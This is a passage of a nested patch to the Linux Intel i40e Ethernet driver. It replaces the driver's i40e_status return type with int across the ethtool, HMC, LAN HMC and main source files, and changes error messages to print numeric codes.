++						 "Starting FW LLDP agent failed: error: %d, %s\n",
++						 status,
+ 						 i40e_aq_str(&pf->hw,
+ 							     adq_err));
+ 					return -EINVAL;
+@@ -5477,8 +5476,8 @@ static int i40e_get_module_info(struct net_device *netdev,
+ 	u32 sff8472_comp = 0;
+ 	u32 sff8472_swap = 0;
+ 	u32 sff8636_rev = 0;
+-	i40e_status status;
+ 	u32 type = 0;
++	int status;
+ 
+ 	/* Check if firmware supports reading module EEPROM. */
+ 	if (!(hw->flags & I40E_HW_FLAG_AQ_PHY_ACCESS_CAPABLE)) {
+@@ -5582,8 +5581,8 @@ static int i40e_get_module_eeprom(struct net_device *netdev,
+ 	struct i40e_pf *pf = vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+ 	bool is_sfp = false;
+-	i40e_status status;
+ 	u32 value = 0;
++	int status;
+ 	int i;
+ 
+ 	if (!ee || !ee->len || !data)
+@@ -5624,10 +5623,10 @@ static int i40e_get_eee(struct net_device *netdev, struct ethtool_eee *edata)
+ {
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_aq_get_phy_abilities_resp phy_cfg;
+-	enum i40e_status_code status = 0;
+ 	struct i40e_vsi *vsi = np->vsi;
+ 	struct i40e_pf *pf = vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
++	int status = 0;
+ 
+ 	/* Get initial PHY capabilities */
+ 	status = i40e_aq_get_phy_capabilities(hw, false, true, &phy_cfg, NULL);
+@@ -5689,11 +5688,11 @@ static int i40e_set_eee(struct net_device *netdev, struct ethtool_eee *edata)
+ {
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+-	enum i40e_status_code status = I40E_SUCCESS;
+ 	struct i40e_aq_set_phy_config config;
+ 	struct i40e_vsi *vsi = np->vsi;
+ 	struct i40e_pf *pf = vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
++	int status = I40E_SUCCESS;
+ 	__le16 eee_capability;
+ 
+ 	/* Deny parameters we don't support */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_hmc.c b/drivers/net/ethernet/intel/i40e/i40e_hmc.c
+index 163ee8c6311cc..46f7950a0049a 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_hmc.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_hmc.c
+@@ -17,17 +17,17 @@
+  * @type: what type of segment descriptor we're manipulating
+  * @direct_mode_sz: size to alloc in direct mode
+  **/
+-i40e_status i40e_add_sd_table_entry(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 sd_index,
+-					      enum i40e_sd_entry_type type,
+-					      u64 direct_mode_sz)
++int i40e_add_sd_table_entry(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 sd_index,
++			    enum i40e_sd_entry_type type,
++			    u64 direct_mode_sz)
+ {
+ 	enum i40e_memory_type mem_type __attribute__((unused));
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 	bool dma_mem_alloc_done = false;
++	int ret_code = I40E_SUCCESS;
+ 	struct i40e_dma_mem mem;
+-	i40e_status ret_code = I40E_SUCCESS;
+ 	u64 alloc_len;
+ 
+ 	if (NULL == hmc_info->sd_table.sd_entry) {
+@@ -106,19 +106,19 @@ exit:
+  *	   aligned on 4K boundary and zeroed memory.
+  *	2. It should be 4K in size.
+  **/
+-i40e_status i40e_add_pd_table_entry(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 pd_index,
+-					      struct i40e_dma_mem *rsrc_pg)
++int i40e_add_pd_table_entry(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 pd_index,
++			    struct i40e_dma_mem *rsrc_pg)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_pd_table *pd_table;
+ 	struct i40e_hmc_pd_entry *pd_entry;
+ 	struct i40e_dma_mem mem;
+ 	struct i40e_dma_mem *page = &mem;
+ 	u32 sd_idx, rel_pd_idx;
+-	u64 *pd_addr;
++	int ret_code = 0;
+ 	u64 page_desc;
++	u64 *pd_addr;
+ 
+ 	if (pd_index / I40E_HMC_PD_CNT_IN_SD >= hmc_info->sd_table.sd_cnt) {
+ 		ret_code = I40E_ERR_INVALID_PAGE_DESC_INDEX;
+@@ -185,15 +185,15 @@ exit:
+  *	1. Caller can deallocate the memory used by backing storage after this
+  *	   function returns.
+  **/
+-i40e_status i40e_remove_pd_bp(struct i40e_hw *hw,
+-					struct i40e_hmc_info *hmc_info,
+-					u32 idx)
++int i40e_remove_pd_bp(struct i40e_hw *hw,
++		      struct i40e_hmc_info *hmc_info,
++		      u32 idx)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_pd_entry *pd_entry;
+ 	struct i40e_hmc_pd_table *pd_table;
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 	u32 sd_idx, rel_pd_idx;
++	int ret_code = 0;
+ 	u64 *pd_addr;
+ 
+ 	/* calculate index */
+@@ -241,11 +241,11 @@ exit:
+  * @hmc_info: pointer to the HMC configuration information structure
+  * @idx: the page index
+  **/
+-i40e_status i40e_prep_remove_sd_bp(struct i40e_hmc_info *hmc_info,
+-					     u32 idx)
++int i40e_prep_remove_sd_bp(struct i40e_hmc_info *hmc_info,
++			   u32 idx)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_sd_entry *sd_entry;
++	int ret_code = 0;
+ 
+ 	/* get the entry and decrease its ref counter */
+ 	sd_entry = &hmc_info->sd_table.sd_entry[idx];
+@@ -269,9 +269,9 @@ exit:
+  * @idx: the page index
+  * @is_pf: used to distinguish between VF and PF
+  **/
+-i40e_status i40e_remove_sd_bp_new(struct i40e_hw *hw,
+-					    struct i40e_hmc_info *hmc_info,
+-					    u32 idx, bool is_pf)
++int i40e_remove_sd_bp_new(struct i40e_hw *hw,
++			  struct i40e_hmc_info *hmc_info,
++			  u32 idx, bool is_pf)
+ {
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 
+@@ -290,11 +290,11 @@ i40e_status i40e_remove_sd_bp_new(struct i40e_hw *hw,
+  * @hmc_info: pointer to the HMC configuration information structure
+  * @idx: segment descriptor index to find the relevant page descriptor
+  **/
+-i40e_status i40e_prep_remove_pd_page(struct i40e_hmc_info *hmc_info,
+-					       u32 idx)
++int i40e_prep_remove_pd_page(struct i40e_hmc_info *hmc_info,
++			     u32 idx)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_sd_entry *sd_entry;
++	int ret_code = 0;
+ 
+ 	sd_entry = &hmc_info->sd_table.sd_entry[idx];
+ 
+@@ -318,9 +318,9 @@ exit:
+  * @idx: segment descriptor index to find the relevant page descriptor
+  * @is_pf: used to distinguish between VF and PF
+  **/
+-i40e_status i40e_remove_pd_page_new(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 idx, bool is_pf)
++int i40e_remove_pd_page_new(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 idx, bool is_pf)
+ {
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_hmc.h b/drivers/net/ethernet/intel/i40e/i40e_hmc.h
+index 3113792afaffa..9960da07a5732 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_hmc.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_hmc.h
+@@ -187,28 +187,28 @@ struct i40e_hmc_info {
+ 	/* add one more to the limit to correct our range */		\
+ 	*(pd_limit) += 1;						\
+ }
+-i40e_status i40e_add_sd_table_entry(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 sd_index,
+-					      enum i40e_sd_entry_type type,
+-					      u64 direct_mode_sz);
+-
+-i40e_status i40e_add_pd_table_entry(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 pd_index,
+-					      struct i40e_dma_mem *rsrc_pg);
+-i40e_status i40e_remove_pd_bp(struct i40e_hw *hw,
+-					struct i40e_hmc_info *hmc_info,
+-					u32 idx);
+-i40e_status i40e_prep_remove_sd_bp(struct i40e_hmc_info *hmc_info,
+-					     u32 idx);
+-i40e_status i40e_remove_sd_bp_new(struct i40e_hw *hw,
+-					    struct i40e_hmc_info *hmc_info,
+-					    u32 idx, bool is_pf);
+-i40e_status i40e_prep_remove_pd_page(struct i40e_hmc_info *hmc_info,
+-					       u32 idx);
+-i40e_status i40e_remove_pd_page_new(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 idx, bool is_pf);
++
++int i40e_add_sd_table_entry(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 sd_index,
++			    enum i40e_sd_entry_type type,
++			    u64 direct_mode_sz);
++int i40e_add_pd_table_entry(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 pd_index,
++			    struct i40e_dma_mem *rsrc_pg);
++int i40e_remove_pd_bp(struct i40e_hw *hw,
++		      struct i40e_hmc_info *hmc_info,
++		      u32 idx);
++int i40e_prep_remove_sd_bp(struct i40e_hmc_info *hmc_info,
++			   u32 idx);
++int i40e_remove_sd_bp_new(struct i40e_hw *hw,
++			  struct i40e_hmc_info *hmc_info,
++			  u32 idx, bool is_pf);
++int i40e_prep_remove_pd_page(struct i40e_hmc_info *hmc_info,
++			     u32 idx);
++int i40e_remove_pd_page_new(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 idx, bool is_pf);
+ 
+ #endif /* _I40E_HMC_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.c b/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.c
+index d6e92ecddfbd8..40c101f286d19 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.c
+@@ -74,12 +74,12 @@ static u64 i40e_calculate_l2fpm_size(u32 txq_num, u32 rxq_num,
+  * Assumptions:
+  *   - HMC Resource Profile has been selected before calling this function.
+  **/
+-i40e_status i40e_init_lan_hmc(struct i40e_hw *hw, u32 txq_num,
+-					u32 rxq_num, u32 fcoe_cntx_num,
+-					u32 fcoe_filt_num)
++int i40e_init_lan_hmc(struct i40e_hw *hw, u32 txq_num,
++		      u32 rxq_num, u32 fcoe_cntx_num,
++		      u32 fcoe_filt_num)
+ {
+ 	struct i40e_hmc_obj_info *obj, *full_obj;
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u64 l2fpm_size;
+ 	u32 size_exp;
+ 
+@@ -229,11 +229,11 @@ init_lan_hmc_out:
+  *	1. caller can deallocate the memory used by pd after this function
+  *	   returns.
+  **/
+-static i40e_status i40e_remove_pd_page(struct i40e_hw *hw,
+-						 struct i40e_hmc_info *hmc_info,
+-						 u32 idx)
++static int i40e_remove_pd_page(struct i40e_hw *hw,
++			       struct i40e_hmc_info *hmc_info,
++			       u32 idx)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (!i40e_prep_remove_pd_page(hmc_info, idx))
+ 		ret_code = i40e_remove_pd_page_new(hw, hmc_info, idx, true);
+@@ -256,11 +256,11 @@ static i40e_status i40e_remove_pd_page(struct i40e_hw *hw,
+  *	1. caller can deallocate the memory used by backing storage after this
+  *	   function returns.
+  **/
+-static i40e_status i40e_remove_sd_bp(struct i40e_hw *hw,
+-					       struct i40e_hmc_info *hmc_info,
+-					       u32 idx)
++static int i40e_remove_sd_bp(struct i40e_hw *hw,
++			     struct i40e_hmc_info *hmc_info,
++			     u32 idx)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (!i40e_prep_remove_sd_bp(hmc_info, idx))
+ 		ret_code = i40e_remove_sd_bp_new(hw, hmc_info, idx, true);
+@@ -276,15 +276,15 @@ static i40e_status i40e_remove_sd_bp(struct i40e_hw *hw,
+  * This will allocate memory for PDs and backing pages and populate
+  * the sd and pd entries.
+  **/
+-static i40e_status i40e_create_lan_hmc_object(struct i40e_hw *hw,
+-				struct i40e_hmc_lan_create_obj_info *info)
++static int i40e_create_lan_hmc_object(struct i40e_hw *hw,
++				      struct i40e_hmc_lan_create_obj_info *info)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 	u32 pd_idx1 = 0, pd_lmt1 = 0;
+ 	u32 pd_idx = 0, pd_lmt = 0;
+ 	bool pd_error = false;
+ 	u32 sd_idx, sd_lmt;
++	int ret_code = 0;
+ 	u64 sd_size;
+ 	u32 i, j;
+ 
+@@ -435,13 +435,13 @@ exit:
+  * - This function will be called after i40e_init_lan_hmc() and before
+  *   any LAN/FCoE HMC objects can be created.
+  **/
+-i40e_status i40e_configure_lan_hmc(struct i40e_hw *hw,
+-					     enum i40e_hmc_model model)
++int i40e_configure_lan_hmc(struct i40e_hw *hw,
++			   enum i40e_hmc_model model)
+ {
+ 	struct i40e_hmc_lan_create_obj_info info;
+-	i40e_status ret_code = 0;
+ 	u8 hmc_fn_id = hw->hmc.hmc_fn_id;
+ 	struct i40e_hmc_obj_info *obj;
++	int ret_code = 0;
+ 
+ 	/* Initialize part of the create object info struct */
+ 	info.hmc_info = &hw->hmc;
+@@ -520,13 +520,13 @@ configure_lan_hmc_out:
+  * caller should deallocate memory allocated previously for
+  * book-keeping information about PDs and backing storage.
+  **/
+-static i40e_status i40e_delete_lan_hmc_object(struct i40e_hw *hw,
+-				struct i40e_hmc_lan_delete_obj_info *info)
++static int i40e_delete_lan_hmc_object(struct i40e_hw *hw,
++				      struct i40e_hmc_lan_delete_obj_info *info)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_pd_table *pd_table;
+ 	u32 pd_idx, pd_lmt, rel_pd_idx;
+ 	u32 sd_idx, sd_lmt;
++	int ret_code = 0;
+ 	u32 i, j;
+ 
+ 	if (NULL == info) {
+@@ -632,10 +632,10 @@ exit:
+  * This must be called by drivers as they are shutting down and being
+  * removed from the OS.
+  **/
+-i40e_status i40e_shutdown_lan_hmc(struct i40e_hw *hw)
++int i40e_shutdown_lan_hmc(struct i40e_hw *hw)
+ {
+ 	struct i40e_hmc_lan_delete_obj_info info;
+-	i40e_status ret_code;
++	int ret_code;
+ 
+ 	info.hmc_info = &hw->hmc;
+ 	info.rsrc_type = I40E_HMC_LAN_FULL;
+@@ -915,9 +915,9 @@ static void i40e_write_qword(u8 *hmc_bits,
+  * @context_bytes: pointer to the context bit array (DMA memory)
+  * @hmc_type: the type of HMC resource
+  **/
+-static i40e_status i40e_clear_hmc_context(struct i40e_hw *hw,
+-					u8 *context_bytes,
+-					enum i40e_hmc_lan_rsrc_type hmc_type)
++static int i40e_clear_hmc_context(struct i40e_hw *hw,
++				  u8 *context_bytes,
++				  enum i40e_hmc_lan_rsrc_type hmc_type)
+ {
+ 	/* clean the bit array */
+ 	memset(context_bytes, 0, (u32)hw->hmc.hmc_obj[hmc_type].size);
+@@ -931,9 +931,9 @@ static i40e_status i40e_clear_hmc_context(struct i40e_hw *hw,
+  * @ce_info:  a description of the struct to be filled
+  * @dest:     the struct to be filled
+  **/
+-static i40e_status i40e_set_hmc_context(u8 *context_bytes,
+-					struct i40e_context_ele *ce_info,
+-					u8 *dest)
++static int i40e_set_hmc_context(u8 *context_bytes,
++				struct i40e_context_ele *ce_info,
++				u8 *dest)
+ {
+ 	int f;
+ 
+@@ -973,18 +973,18 @@ static i40e_status i40e_set_hmc_context(u8 *context_bytes,
+  * base pointer.  This function is used for LAN Queue contexts.
+  **/
+ static
+-i40e_status i40e_hmc_get_object_va(struct i40e_hw *hw, u8 **object_base,
+-				   enum i40e_hmc_lan_rsrc_type rsrc_type,
+-				   u32 obj_idx)
++int i40e_hmc_get_object_va(struct i40e_hw *hw, u8 **object_base,
++			   enum i40e_hmc_lan_rsrc_type rsrc_type,
++			   u32 obj_idx)
+ {
+ 	struct i40e_hmc_info *hmc_info = &hw->hmc;
+ 	u32 obj_offset_in_sd, obj_offset_in_pd;
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 	struct i40e_hmc_pd_entry *pd_entry;
+ 	u32 pd_idx, pd_lmt, rel_pd_idx;
+-	i40e_status ret_code = 0;
+ 	u64 obj_offset_in_fpm;
+ 	u32 sd_idx, sd_lmt;
++	int ret_code = 0;
+ 
+ 	if (NULL == hmc_info) {
+ 		ret_code = I40E_ERR_BAD_PTR;
+@@ -1042,11 +1042,11 @@ exit:
+  * @hw:    the hardware struct
+  * @queue: the queue we care about
+  **/
+-i40e_status i40e_clear_lan_tx_queue_context(struct i40e_hw *hw,
+-						      u16 queue)
++int i40e_clear_lan_tx_queue_context(struct i40e_hw *hw,
++				    u16 queue)
+ {
+-	i40e_status err;
+ 	u8 *context_bytes;
++	int err;
+ 
+ 	err = i40e_hmc_get_object_va(hw, &context_bytes,
+ 				     I40E_HMC_LAN_TX, queue);
+@@ -1062,12 +1062,12 @@ i40e_status i40e_clear_lan_tx_queue_context(struct i40e_hw *hw,
+  * @queue: the queue we care about
+  * @s:     the struct to be filled
+  **/
+-i40e_status i40e_set_lan_tx_queue_context(struct i40e_hw *hw,
+-						    u16 queue,
+-						    struct i40e_hmc_obj_txq *s)
++int i40e_set_lan_tx_queue_context(struct i40e_hw *hw,
++				  u16 queue,
++				  struct i40e_hmc_obj_txq *s)
+ {
+-	i40e_status err;
+ 	u8 *context_bytes;
++	int err;
+ 
+ 	err = i40e_hmc_get_object_va(hw, &context_bytes,
+ 				     I40E_HMC_LAN_TX, queue);
+@@ -1083,11 +1083,11 @@ i40e_status i40e_set_lan_tx_queue_context(struct i40e_hw *hw,
+  * @hw:    the hardware struct
+  * @queue: the queue we care about
+  **/
+-i40e_status i40e_clear_lan_rx_queue_context(struct i40e_hw *hw,
+-						      u16 queue)
++int i40e_clear_lan_rx_queue_context(struct i40e_hw *hw,
++				    u16 queue)
+ {
+-	i40e_status err;
+ 	u8 *context_bytes;
++	int err;
+ 
+ 	err = i40e_hmc_get_object_va(hw, &context_bytes,
+ 				     I40E_HMC_LAN_RX, queue);
+@@ -1103,12 +1103,12 @@ i40e_status i40e_clear_lan_rx_queue_context(struct i40e_hw *hw,
+  * @queue: the queue we care about
+  * @s:     the struct to be filled
+  **/
+-i40e_status i40e_set_lan_rx_queue_context(struct i40e_hw *hw,
+-						    u16 queue,
+-						    struct i40e_hmc_obj_rxq *s)
++int i40e_set_lan_rx_queue_context(struct i40e_hw *hw,
++				  u16 queue,
++				  struct i40e_hmc_obj_rxq *s)
+ {
+-	i40e_status err;
+ 	u8 *context_bytes;
++	int err;
+ 
+ 	err = i40e_hmc_get_object_va(hw, &context_bytes,
+ 				     I40E_HMC_LAN_RX, queue);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.h b/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.h
+index c46a2c449e60e..9f960404c2b37 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.h
+@@ -137,22 +137,22 @@ struct i40e_hmc_lan_delete_obj_info {
+ 	u32 count;
+ };
+ 
+-i40e_status i40e_init_lan_hmc(struct i40e_hw *hw, u32 txq_num,
+-					u32 rxq_num, u32 fcoe_cntx_num,
+-					u32 fcoe_filt_num);
+-i40e_status i40e_configure_lan_hmc(struct i40e_hw *hw,
+-					     enum i40e_hmc_model model);
+-i40e_status i40e_shutdown_lan_hmc(struct i40e_hw *hw);
+-
+-i40e_status i40e_clear_lan_tx_queue_context(struct i40e_hw *hw,
+-						      u16 queue);
+-i40e_status i40e_set_lan_tx_queue_context(struct i40e_hw *hw,
+-						    u16 queue,
+-						    struct i40e_hmc_obj_txq *s);
+-i40e_status i40e_clear_lan_rx_queue_context(struct i40e_hw *hw,
+-						      u16 queue);
+-i40e_status i40e_set_lan_rx_queue_context(struct i40e_hw *hw,
+-						    u16 queue,
+-						    struct i40e_hmc_obj_rxq *s);
++int i40e_init_lan_hmc(struct i40e_hw *hw, u32 txq_num,
++		      u32 rxq_num, u32 fcoe_cntx_num,
++		      u32 fcoe_filt_num);
++int i40e_configure_lan_hmc(struct i40e_hw *hw,
++			   enum i40e_hmc_model model);
++int i40e_shutdown_lan_hmc(struct i40e_hw *hw);
++
++int i40e_clear_lan_tx_queue_context(struct i40e_hw *hw,
++				    u16 queue);
++int i40e_set_lan_tx_queue_context(struct i40e_hw *hw,
++				  u16 queue,
++				  struct i40e_hmc_obj_txq *s);
++int i40e_clear_lan_rx_queue_context(struct i40e_hw *hw,
++				    u16 queue);
++int i40e_set_lan_rx_queue_context(struct i40e_hw *hw,
++				  u16 queue,
++				  struct i40e_hmc_obj_rxq *s);
+ 
+ #endif /* _I40E_LAN_HMC_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 3ac7234a85bbb..49ba9f1be952d 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -1817,13 +1817,13 @@ static int i40e_set_mac(struct net_device *netdev, void *p)
+ 	spin_unlock_bh(&vsi->mac_filter_hash_lock);
+ 
+ 	if (vsi->type == I40E_VSI_MAIN) {
+-		i40e_status ret;
++		int ret;
+ 
+ 		ret = i40e_aq_mac_address_write(hw, I40E_AQC_WRITE_TYPE_LAA_WOL,
+ 						addr->sa_data, NULL);
+ 		if (ret)
+-			netdev_info(netdev, "Ignoring error from firmware on LAA update, status %s, AQ ret %s\n",
+-				    i40e_stat_str(hw, ret),
++			netdev_info(netdev, "Ignoring error from firmware on LAA update, status %d, AQ ret %s\n",
++				    ret,
+ 				    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 	}
+ 
+@@ -1854,8 +1854,8 @@ static int i40e_config_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 		ret = i40e_aq_set_rss_key(hw, vsi->id, seed_dw);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot set RSS key, err %s aq_err %s\n",
+-				 i40e_stat_str(hw, ret),
++				 "Cannot set RSS key, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			return ret;
+ 		}
+@@ -1866,8 +1866,8 @@ static int i40e_config_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 		ret = i40e_aq_set_rss_lut(hw, vsi->id, pf_lut, lut, lut_size);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot set RSS lut, err %s aq_err %s\n",
+-				 i40e_stat_str(hw, ret),
++				 "Cannot set RSS lut, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			return ret;
+ 		}
+@@ -2349,7 +2349,7 @@ void i40e_aqc_del_filters(struct i40e_vsi *vsi, const char *vsi_name,
+ {
+ 	struct i40e_hw *hw = &vsi->back->hw;
+ 	enum i40e_admin_queue_err aq_status;
+-	i40e_status aq_ret;
++	int aq_ret;
+ 
+ 	aq_ret = i40e_aq_remove_macvlan_v2(hw, vsi->seid, list, num_del, NULL,
+ 					   &aq_status);
+@@ -2358,8 +2358,8 @@ void i40e_aqc_del_filters(struct i40e_vsi *vsi, const char *vsi_name,
+ 	if (aq_ret && !(aq_status == I40E_AQ_RC_ENOENT)) {
+ 		*retval = -EIO;
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "ignoring delete macvlan error on %s, err %s, aq_err %s\n",
+-			 vsi_name, i40e_stat_str(hw, aq_ret),
++			 "ignoring delete macvlan error on %s, err %d, aq_err %s\n",
++			 vsi_name, aq_ret,
+ 			 i40e_aq_str(hw, aq_status));
+ 	}
+ }
+@@ -2423,13 +2423,13 @@ void i40e_aqc_add_filters(struct i40e_vsi *vsi, const char *vsi_name,
+  *
+  * Returns status indicating success or failure;
+  **/
+-static i40e_status
++static int
+ i40e_aqc_broadcast_filter(struct i40e_vsi *vsi, const char *vsi_name,
+ 			  struct i40e_mac_filter *f)
+ {
+ 	bool enable = f->state == I40E_FILTER_NEW;
+ 	struct i40e_hw *hw = &vsi->back->hw;
+-	i40e_status aq_ret;
++	int aq_ret;
+ 
+ 	if (f->vlan == I40E_VLAN_ANY) {
+ 		aq_ret = i40e_aq_set_vsi_broadcast(hw,
+@@ -2468,7 +2468,7 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ {
+ 	struct i40e_vsi *vsi = pf->vsi[pf->lan_vsi];
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status aq_ret;
++	int aq_ret;
+ 
+ 	if (vsi->type == I40E_VSI_MAIN &&
+ 	    pf->lan_veb != I40E_NO_VEB &&
+@@ -2488,8 +2488,8 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ 							   NULL);
+ 		if (aq_ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Set default VSI failed, err %s, aq_err %s\n",
+-				 i40e_stat_str(hw, aq_ret),
++				 "Set default VSI failed, err %d, aq_err %s\n",
++				 aq_ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 	} else {
+@@ -2500,8 +2500,8 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ 						  true);
+ 		if (aq_ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "set unicast promisc failed, err %s, aq_err %s\n",
+-				 i40e_stat_str(hw, aq_ret),
++				 "set unicast promisc failed, err %d, aq_err %s\n",
++				 aq_ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 		aq_ret = i40e_aq_set_vsi_multicast_promiscuous(
+@@ -2510,8 +2510,8 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ 						  promisc, NULL);
+ 		if (aq_ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "set multicast promisc failed, err %s, aq_err %s\n",
+-				 i40e_stat_str(hw, aq_ret),
++				 "set multicast promisc failed, err %d, aq_err %s\n",
++				 aq_ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 	}
+@@ -2541,12 +2541,12 @@ int i40e_sync_vsi_filters(struct i40e_vsi *vsi)
+ 	unsigned int vlan_filters = 0;
+ 	char vsi_name[16] = "PF";
+ 	int filter_list_len = 0;
+-	i40e_status aq_ret = 0;
+ 	u32 changed_flags = 0;
+ 	struct hlist_node *h;
+ 	struct i40e_pf *pf;
+ 	int num_add = 0;
+ 	int num_del = 0;
++	int aq_ret = 0;
+ 	int retval = 0;
+ 	u16 cmd_flags;
+ 	int list_size;
+@@ -2814,9 +2814,9 @@ int i40e_sync_vsi_filters(struct i40e_vsi *vsi)
+ 			retval = i40e_aq_rc_to_posix(aq_ret,
+ 						     hw->aq.asq_last_status);
+ 			dev_info(&pf->pdev->dev,
+-				 "set multi promisc failed on %s, err %s aq_err %s\n",
++				 "set multi promisc failed on %s, err %d aq_err %s\n",
+ 				 vsi_name,
+-				 i40e_stat_str(hw, aq_ret),
++				 aq_ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		} else {
+ 			dev_info(&pf->pdev->dev, "%s allmulti mode.\n",
+@@ -2834,10 +2834,10 @@ int i40e_sync_vsi_filters(struct i40e_vsi *vsi)
+ 			retval = i40e_aq_rc_to_posix(aq_ret,
+ 						     hw->aq.asq_last_status);
+ 			dev_info(&pf->pdev->dev,
+-				 "Setting promiscuous %s failed on %s, err %s aq_err %s\n",
++				 "Setting promiscuous %s failed on %s, err %d aq_err %s\n",
+ 				 cur_promisc ? "on" : "off",
+ 				 vsi_name,
+-				 i40e_stat_str(hw, aq_ret),
++				 aq_ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 	}
+@@ -2965,7 +2965,7 @@ int i40e_ioctl(struct net_device *netdev, struct ifreq *ifr, int cmd)
+ void i40e_vlan_stripping_enable(struct i40e_vsi *vsi)
+ {
+ 	struct i40e_vsi_context ctxt;
+-	i40e_status ret;
++	int ret;
+ 
+ 	/* Don't modify stripping options if a port VLAN is active */
+ 	if (vsi->info.pvid)
+@@ -2985,8 +2985,8 @@ void i40e_vlan_stripping_enable(struct i40e_vsi *vsi)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "update vlan stripping failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&vsi->back->hw, ret),
++			 "update vlan stripping failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&vsi->back->hw,
+ 				     vsi->back->hw.aq.asq_last_status));
+ 	}
+@@ -2999,7 +2999,7 @@ void i40e_vlan_stripping_enable(struct i40e_vsi *vsi)
+ void i40e_vlan_stripping_disable(struct i40e_vsi *vsi)
+ {
+ 	struct i40e_vsi_context ctxt;
+-	i40e_status ret;
++	int ret;
+ 
+ 	/* Don't modify stripping options if a port VLAN is active */
+ 	if (vsi->info.pvid)
+@@ -3020,8 +3020,8 @@ void i40e_vlan_stripping_disable(struct i40e_vsi *vsi)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "update vlan stripping failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&vsi->back->hw, ret),
++			 "update vlan stripping failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&vsi->back->hw,
